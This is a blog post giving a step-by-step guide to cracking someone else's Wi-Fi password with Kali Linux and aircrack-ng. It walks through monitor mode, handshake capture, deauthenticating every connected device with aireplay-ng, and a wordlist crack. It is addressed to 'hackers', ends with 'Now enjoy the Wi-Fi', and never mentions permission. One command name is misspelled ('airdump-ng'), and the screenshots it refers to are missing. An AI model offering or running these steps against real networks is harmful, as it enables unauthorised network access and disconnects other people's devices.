Tuesday, 21 July 2020

HOW TO HACK WI-FI PASSWORD - A STEP BY STEP GUIDE

HOW TO HACK WI-FI



Hello Hackers , Today we will show you how you can easily hack wi-fi password within a couple of minutes . So without wasting any more time let's start . 

REQUIREMENTS :

1. Wi-Fi Adapter ( I have used Leoxsys Wi-Fi adapter ). You can purchase it from Amazon and Flipkart--LINK BELOW--

2. Kali Linux

3. Internet Connection

PROCEDURE :

1. Plug-in your Wi-Fi adapter.

2. Open terminal in Kali Linux and type iwconfig and press ENTER . You will see that you adapter properties will be shown with wlan0 interface .


3. To avoid issue and problem you need to write one command which will kill all the other process which might create problem . Type airmon-ng check kill


4. As you can see the Wi-Fi adapter is on Managed mode , So you need to first convert the Wi-Fi adapter from Managed mode to Monitor mode , To do this type airmon-ng start wlan0



5. After converting to Monitor mode the interface name will change from wlan0 to wlan0mon.

6. Now you need to scan the network using your Wi-Fi adapter . To scan the network type airdump-ng wlan0mon


NOTE : SELECT ONLY THAT TARGET WHICH COMES IN BOTH THE PANES AS SHOWN IN THE GIVEN BELOW FIGURE :


7. Now we will try to do Handshake and try to capture the packets. Its a 4 way Handshake.
To capture the packets type airodump-ng --bssid <BSSID OF THE DEVICE> -c <CHANNEL NAME> -w <FILE PATH> wlan0mon. Your packets will start collecting in a file.

8. To make the handshake faster , type aireplay-ng -0 0 -a <BSSID> wlan0mon . This command will send deauthentication packets to the others device which are connected to the Wi-Fi means it will desconnect all the devices connected to that Wi-Fi and then try to re-establish the connect. 

9. Now you have to just wait for the handshake.

After the handshake is established , Your work is complete.

10. The file in which the packets are stored , using that file we will crack the password of that Wi-Fi . To crack the password type aircrack-ng -w <WORDLIST PATH> <FILE PATH>.
NOTE : USE .cap FILE AS THE FILE PATH.


NOW JUST SIT AND WATCH , WORDLIST WILL CRACK THE PASSWORD AS SHOWN BELOW :

In the above picture you can see that password has been cracked. Now enjoy the Wi-Fi.

IF YOU LIKE THIS PLEASE LIKE , SHARE AND COMMENT . SUBSCRIBE TO OUR YOUTUBE CHANNEL AND FOLLOW US ON SOCIAL MEDIA NETWORK . <YOU CAN FIND THIS ALL IN THE ABOUT SECTION OF THE YOUTUBE CHANNEL. 
           ---------------------------------------LINK  BELOW -------------------------------------------------


THANK YOU...........................................